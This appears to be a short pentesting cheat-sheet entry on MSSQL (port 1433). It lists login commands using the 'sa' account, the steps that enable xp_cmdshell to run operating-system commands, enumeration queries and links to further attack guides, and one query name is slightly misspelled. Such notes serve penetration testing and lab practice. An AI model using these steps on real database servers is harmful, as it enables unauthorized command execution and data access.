Port 1433 - MSSQL

Login:

sqsh -S $IP -U sa
mssqlclient.py -p 1435 sa:123123@$IP

Check/Enable xp_cmdshell:

sp_configure 'show advanced options', '1'
RECONFIGURE
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
xp_cmdshell cd C:/Users && dir

Get Info

  • DBs

SELECT name FROM master.dbo.sysdatabase

  • Tables

SELECT * FROM $dbname.INFORMATION_SCHEMA.TABLES;

Resources:

LogoMSSQL for Pentester: Command Execution with xp_cmdshell - Hacking ArticlesHacking Articles
LogoMSSQL Practical Injection Cheat Sheet - Perspective RiskPerspective Risk
LogoMSSQL Injection to RCE Guide: Read Output of xp_cmdshellMedium
unsafe.sh - 不安全
PreviousPort 1521 - Oracle DB ListenerNextPort 2049 - NFS

Last updated